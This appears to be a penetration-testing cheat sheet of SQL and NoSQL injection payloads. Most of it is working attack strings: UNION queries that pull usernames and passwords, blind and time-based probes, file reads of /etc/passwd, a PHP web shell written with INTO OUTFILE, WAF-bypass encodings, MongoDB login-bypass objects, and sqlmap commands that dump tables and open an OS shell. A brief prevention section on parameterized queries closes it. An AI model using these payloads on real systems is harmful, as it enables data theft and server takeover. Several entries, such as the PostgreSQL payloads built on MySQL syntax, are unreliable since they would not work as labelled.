SQL Injection Payloads
SQL Injection Payloads Comprehensive collection of SQL injection payloads and bypass techniques for penetration testing. Basic SQL Injection Union-based Injection -- Basic UNION ' UNION SELECT 1,2,3-- ' UNION SELECT NULL,NULL,NULL-- ' UNION SELECT 1,2,3,4,5-- -- With column names ' UNION SELECT username,password,email FROM users-- ' UNION SELECT table_name,column_name FROM information_schema.columns-- -- Multiple columns ' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- Boolean-based Blind Injection -- Basic boolean tests ' OR 1=1-- ' OR '1'='1 ' OR 1=1# ' OR 1=1/* -- Conditional statements ' AND 1=1-- ' AND 1=2-- ' AND (SELECT COUNT(*) FROM users) > 0-- ' AND (SELECT LENGTH(username) FROM users LIMIT 1) > 5-- Time-based Blind Injection -- MySQL ' AND SLEEP(5)-- ' AND (SELECT SLEEP(5))-- ' AND IF(1=1,SLEEP(5),0)-- -- PostgreSQL '; SELECT pg_sleep(5)-- ' AND (SELECT pg_sleep(5))-- -- MSSQL '; WAITFOR DELAY '00:00:05'-- ' AND (SELECT COUNT(*) FROM sys.tables) > 0; WAITFOR DELAY '00:00:05'-- -- Oracle ' AND (SELECT COUNT(*) FROM all_tables) > 0 AND DBMS_LOCK.SLEEP(5)-- Database-specific Payloads MySQL -- Version detection ' UNION SELECT @@version-- ' UNION SELECT VERSION()-- -- Database enumeration ' UNION SELECT SCHEMA_NAME FROM information_schema.schemata-- ' UNION SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA=DATABASE()-- -- User enumeration ' UNION SELECT USER()-- ' UNION SELECT CURRENT_USER()-- ' UNION SELECT user,host FROM mysql.user-- -- File operations ' UNION SELECT LOAD_FILE('/etc/passwd')-- ' UNION SELECT '<?php system($_GET[cmd]); ?>' INTO OUTFILE '/var/www/shell.php'-- PostgreSQL -- Version detection ' UNION SELECT version()-- -- Database enumeration ' UNION SELECT datname FROM pg_database-- ' UNION SELECT tablename FROM pg_tables-- -- User enumeration ' UNION SELECT current_user-- ' UNION SELECT usename FROM pg_user-- -- File operations ' UNION SELECT pg_read_file('/etc/passwd')-- ' UNION SELECT '<?php system($_GET[cmd]); ?>' INTO OUTFILE 
'/var/www/shell.php'-- MSSQL -- Version detection ' UNION SELECT @@version-- ' UNION SELECT SERVERPROPERTY('productversion')-- -- Database enumeration ' UNION SELECT name FROM sys.databases-- ' UNION SELECT table_name FROM information_schema.tables-- -- User enumeration ' UNION SELECT SYSTEM_USER-- ' UNION SELECT USER_NAME()-- ' UNION SELECT name FROM sys.server_principals-- -- File operations ' UNION SELECT * FROM OPENROWSET('BULK','C:\\Windows\\System32\\drivers\\etc\\hosts','SINGLE_CLOB') AS x-- Oracle -- Version detection ' UNION SELECT banner FROM v$version-- ' UNION SELECT version FROM v$instance-- -- Database enumeration ' UNION SELECT table_name FROM all_tables-- ' UNION SELECT column_name FROM all_tab_columns WHERE table_name='USERS'-- -- User enumeration ' UNION SELECT user FROM dual-- ' UNION SELECT username FROM all_users-- -- File operations ' UNION SELECT UTL_FILE.FREAD('DIRECTORY','filename') FROM dual-- Advanced Bypass Techniques WAF Bypass -- Comment variations '/**/UNION/**/SELECT/**/1,2,3-- '/*!UNION*//*!SELECT*/1,2,3-- '%0AUNION%0ASELECT%0A1,2,3-- -- Case variation ' UnIoN SeLeCt 1,2,3-- ' uNiOn sElEcT 1,2,3-- -- Encoding bypass ' %55%4e%49%4f%4e %53%45%4c%45%43%54 1,2,3-- ' %55nion %53elect 1,2,3-- -- Double encoding ' %2555%254e%2549%254f%254e %2553%2545%254c%2545%2543%2554 1,2,3-- Filter Bypass -- Space replacement '/**/UNION/**/SELECT/**/1,2,3-- '%09UNION%09SELECT%091,2,3-- '%0AUNION%0ASELECT%0A1,2,3-- '%0DUNION%0DSELECT%0D1,2,3-- '%0CUNION%0CSELECT%0C1,2,3-- '%0BUNION%0BSELECT%0B1,2,3-- -- Keyword replacement ' UNI/**/ON SEL/**/ECT 1,2,3-- ' UNI%00ON SEL%00ECT 1,2,3-- ' UNI%0aON SEL%0aECT 1,2,3-- Quote Bypass -- Without quotes ' OR 1=1-- ' OR 1=1# ' OR 1=1/* -- With different quote types ' OR "1"="1-- ' OR '1'='1-- ' OR `1`=`1-- -- Hex encoding ' OR 0x31=0x31-- ' OR CHAR(49)=CHAR(49)-- Error-based Injection MySQL Error-based -- Extract database name ' AND extractvalue(1,concat(0x7e,(SELECT database()),0x7e))-- ' AND 
updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- -- Extract table names ' AND extractvalue(1,concat(0x7e,(SELECT table_name FROM information_schema.tables LIMIT 1),0x7e))-- -- Extract column names ' AND extractvalue(1,concat(0x7e,(SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1),0x7e))-- PostgreSQL Error-based -- Extract database name ' AND (SELECT * FROM (SELECT COUNT(*),CONCAT((SELECT database()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -- Extract table names ' AND (SELECT * FROM (SELECT COUNT(*),CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- Second-order SQL Injection User Registration -- Username field admin'-- admin'/* admin'# -- Email field admin@test.com'-- admin@test.com'/* admin@test.com'# Profile Update -- Name field ' OR 1=1-- ' OR '1'='1 ' OR 1=1# -- Bio field ' UNION SELECT username,password FROM users-- ' UNION SELECT 1,2,3-- NoSQL Injection MongoDB // Basic injection {"$ne": null} {"$gt": ""} {"$regex": ".*"} // Authentication bypass {"username": {"$ne": null}, "password": {"$ne": null}} {"username": {"$gt": ""}, "password": {"$gt": ""}} // Data extraction {"$where": "this.username.match(/.*/)"} {"$where": "this.password.match(/.*/)"} CouchDB // Basic injection {"$ne": null} {"$gt": ""} // Authentication bypass {"username": {"$ne": null}, "password": {"$ne": null}} Automated Tools SQLMap Commands # Basic scan sqlmap -u "http://target.com/page.php?id=1" # With POST data sqlmap -u "http://target.com/login.php" --data="username=admin&password=admin" # With cookies sqlmap -u "http://target.com/page.php?id=1" --cookie="PHPSESSID=abc123" # Database enumeration sqlmap -u "http://target.com/page.php?id=1" --dbs sqlmap -u "http://target.com/page.php?id=1" --tables sqlmap -u "http://target.com/page.php?id=1" --columns -T users sqlmap -u "http://target.com/page.php?id=1" --dump -T users # OS shell sqlmap -u 
"http://target.com/page.php?id=1" --os-shell Custom Scripts # Python SQL injection tester import requests import time def test_sql_injection(url, param, payload): data = {param: payload} start_time = time.time() response = requests.post(url, data=data) end_time = time.time() if end_time - start_time > 4: print(f"Time-based injection detected: {payload}") elif "error" in response.text.lower(): print(f"Error-based injection detected: {payload}") elif "success" in response.text.lower(): print(f"Boolean-based injection detected: {payload}") # Test payloads payloads = [ "' OR 1=1--", "' UNION SELECT 1,2,3--", "' AND SLEEP(5)--", "' OR '1'='1" ] for payload in payloads: test_sql_injection("http://target.com/login.php", "username", payload) Prevention and Mitigation Parameterized Queries # Python example cursor.execute("SELECT * FROM users WHERE username = %s AND password = %s", (username, password)) # PHP example $stmt = $pdo->prepare("SELECT * FROM users WHERE username = ? AND password = ?"); $stmt->execute([$username, $password]); Bound parameters keep user input out of the parsed SQL text, so the database never interprets it as query syntax; they do not replace hashing stored passwords or running the application under a least-privilege database account. Input Validation # Whitelist validation allowed_chars = set('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') if not set(username).issubset(allowed_chars): return "Invalid username" # Length validation if len(username) > 50: return "Username too long" Whitelist and length validation are defense in depth and are not a substitute for parameterized queries. Testing Checklist Test all input fields Test with different HTTP methods (GET, POST, PUT, DELETE) Test with different content types (application/x-www-form-urlencoded, application/json) Test with different encodings (URL, Base64, Hex) Test with different quote types (single, double, backtick) Test with different comment styles (--, #, /* */) Test with different space replacements Test with different case variations Test with different encoding bypasses Test with different WAF bypass techniques